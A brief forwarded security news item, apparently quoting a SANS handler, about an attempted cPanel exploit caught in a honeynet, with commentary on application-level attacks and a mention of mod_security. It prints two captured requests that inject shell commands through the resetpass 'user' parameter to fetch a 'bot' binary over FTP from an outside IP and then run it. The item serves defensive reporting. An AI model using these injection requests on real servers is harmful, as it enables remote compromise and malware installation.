NEWS - CPanel Exploits

Greetings:

This information is from sans.org:

=== START

CPanel Exploits

One of our handlers caught an attempted CPanel exploit in his honeynet, and posed a request for additional CPanel exploit traffic. Here's what the handler saw:

GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';echo${BLA}-e${BLA}
open${BLA}64.222.183.58${BLA10723\\nuser${BLA}ftp${BLA}bla\\nget${BLA}bot
\\nquit\\n${BLA}|${BLA}ftp${BLA}-n%60%7C HTTP/1.0

followed by the execution:
GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';./bot%60%7C HTTP/1.0

I'd like to extend the request to include all kinds of application level attacks.

As we slowly but surely develop defenses against the classical stack-smashing attacks (and hopefully begin coding in such a way where they become irrelevant), application level attacks will become increasingly profitable to the attacker.

Besides the (usually) softer target, application attacks
have the added benefit of frequently slipping past the classical perimeter defense mechanisms of traditional IDS and firewalls.

Furthermore, by popping a service and rooting a box, the attacker simply owns the box - but, if the attacker can successfully exploit application level flaws, he or she can own the *data*, which more often than not is a much more valuable prize.

=== END

NOTE: mod_security from http://www.modsecurity.org/ can be set up to help protect against this type of attack.

Thank you.

 

 

 

 

Top